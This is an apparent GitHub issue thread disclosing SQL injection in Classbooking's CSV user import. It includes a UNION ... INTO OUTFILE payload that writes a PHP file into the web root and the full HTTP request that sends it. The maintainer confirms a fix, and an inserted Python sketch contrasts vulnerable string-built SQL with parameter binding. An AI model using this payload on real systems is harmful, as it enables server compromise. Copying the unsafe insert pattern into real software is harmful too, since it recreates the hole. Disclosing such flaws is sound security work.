
Classbooking v2.2.0 has SQL injection #27

Closed
hakuQAQ opened this issue Dec 8, 2020 · 2 comments

@hakuQAQ

hakuQAQ commented Dec 8, 2020

After the administrator logs in and chooses to import a csv file when adding a new user, there is SQL injection in the csv file's username field.


The csv file is as follows:
test'/**/union/**/select/**/'<?php phpinfo(); ?>'/**/into/**/outfile/**/'C:\\phpstudy_pro\\WWW\\hcms\\info.php'#, test, test, 123@qwe.com, test1234

If MySQL has write permissions, this csv file will create a new phpinfo file in the website directory.

The POST file is:

POST /hcms/index.php/users/import HTTP/1.1
Host: 192.168.31.120
Content-Length: 825
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.31.120
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzClKDALsrTEKS6TB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.31.120/hcms/index.php/users/import
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: crbs=tr55skb4jdshkp7vcpb7q4i0pbd2te46
Connection: close

------WebKitFormBoundaryzClKDALsrTEKS6TB
Content-Disposition: form-data; name="action"

import
------WebKitFormBoundaryzClKDALsrTEKS6TB
Content-Disposition: form-data; name="userfile"; filename="1.csv"
Content-Type: application/vnd.ms-excel

test'/**/union/**/select/**/'<?php phpinfo(); ?>'/**/into/**/outfile/**/'C:\\phpstudy_pro\\WWW\\hcms\\info.php'#, test, test, 123@qwe.com, test1234
------WebKitFormBoundaryzClKDALsrTEKS6TB
Content-Disposition: form-data; name="password"


------WebKitFormBoundaryzClKDALsrTEKS6TB
Content-Disposition: form-data; name="authlevel"

2
------WebKitFormBoundaryzClKDALsrTEKS6TB
Content-Disposition: form-data; name="enabled"

0
------WebKitFormBoundaryzClKDALsrTEKS6TB
Content-Disposition: form-data; name="enabled"

1
------WebKitFormBoundaryzClKDALsrTEKS6TB--

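The import path described in the report, as an added illustration that is not Classbooking's own code: a Python sketch (the project itself is PHP, so this shows the pattern rather than the real code path) of the vulnerable string-building insert beside a hardened import that binds each CSV field as a query parameter and rejects usernames outside an allowlist. The table layout, column names and the username rule are assumptions; the sample CSV line is constructed from the payload shown above.

```python
import csv
import io
import re
import sqlite3

# Constructed sample modelled on the issue's csv line: the username field carries the payload.
CSV_SAMPLE = (
    "test'/**/union/**/select/**/'<?php phpinfo(); ?>'/**/into/**/outfile/**/"
    "'C:\\\\phpstudy_pro\\\\WWW\\\\hcms\\\\info.php'#, test, test, 123@qwe.com, test1234\n"
)

# Assumed allowlist for usernames; Classbooking's own rule may differ.
USERNAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,64}$")


def parse_rows(text):
    """Parse the import file with the csv module; rows without exactly five fields are skipped."""
    rows = []
    for fields in csv.reader(io.StringIO(text)):
        if len(fields) != 5:
            continue
        username, first, last, email, password = (f.strip() for f in fields)
        rows.append({"username": username, "first": first, "last": last,
                     "email": email, "password": password})
    return rows


def build_insert_unsafe(row):
    """The vulnerable pattern: a quote inside any field ends the literal and the rest becomes SQL."""
    return ("INSERT INTO users (username, firstname, lastname, email) VALUES ('"
            + row["username"] + "', '" + row["first"] + "', '" + row["last"]
            + "', '" + row["email"] + "')")


def new_db():
    """Assumed schema: an in-memory table standing in for the real users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, firstname TEXT, lastname TEXT, email TEXT)")
    return conn


def insert_user_safe(conn, row):
    """Parameter binding: values travel separately from the statement, so quotes in them are inert."""
    conn.execute("INSERT INTO users (username, firstname, lastname, email) VALUES (?, ?, ?, ?)",
                 (row["username"], row["first"], row["last"], row["email"]))


def import_users(conn, text):
    """Hardened import: validate the username, then bind; returns (imported count, rejected usernames)."""
    imported, rejected = 0, []
    for row in parse_rows(text):
        if not USERNAME_RE.match(row["username"]):
            rejected.append(row["username"])
            continue
        insert_user_safe(conn, row)
        imported += 1
    conn.commit()
    return imported, rejected
```

Even without the allowlist, the bound insert stores the whole payload as an ordinary username string; the allowlist is defence in depth that also keeps such rows out of the audit trail.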

@craigrodway
Owner

Hi hakuQAQ, thanks very much for reporting this issue.

I haven't had chance to fully investigate yet but it does seem possible and needs fixing. A new version will be released shortly to address this.

@craigrodway
Owner

Thanks again for reporting this; it has now been fixed in the latest release, 2.4.1.
